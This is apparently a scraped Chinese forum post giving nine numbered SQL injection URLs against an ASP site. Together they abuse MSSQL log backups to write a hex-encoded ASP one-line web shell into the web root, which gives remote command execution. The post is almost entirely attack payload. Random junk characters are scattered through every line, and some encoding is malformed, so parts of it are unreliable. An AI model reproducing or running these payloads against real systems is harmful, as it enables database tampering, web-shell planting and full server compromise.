第一步
7 @% K. y1 q6 O. _! C* r" S" jhttp://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--
, u' I B; @& ~: ?: D; s/ @: `$ \$ ~7 U- x7 v
第二步:6 _ P! |4 B1 C Q' `* B
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
_, u* a, h0 x( t/ E
+ _/ z7 P: z! S; L- n第三步
: q2 Q3 X* H8 B* `& @( u* Bhttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--4 Z P, B. B( B( @
8 X0 {% D% }4 @( E
第四步
. c$ T0 B O0 r6 I- ?http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--( `" @% K/ n9 w) |7 P9 Z7 v; F# G
6 ^' A, |) u M; N第五步
# o8 D {. L# f$ c3 p6 @2 Hhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--0 P: ]& b( x- T
2 S: B9 y& e8 p6 q2 B% D
第六步
8 t" I4 k$ n9 z+ O9 s: t2 h; Khttp://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)-- l& A7 e8 r T2 c7 a% h8 }: l `
9 x5 s- ]* n) v7 x% o第七步
- v- i6 H+ J' g& I: L5 Phttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--9 j* G. x% h) k- G. }7 m3 Y6 w
% G) _; A/ f8 T% S& a$ }/ e第八步
) G* d& o+ ]/ h) }% e/ Fhttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
, u: g* G2 N) @" J. Y0 N/ f
* x0 u7 {: ^+ Q# p0 T. I第九步/ F/ Z6 ]+ x) @, h
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--" N2 ?& `& Y- L8 ^$ O& _# m+ t
|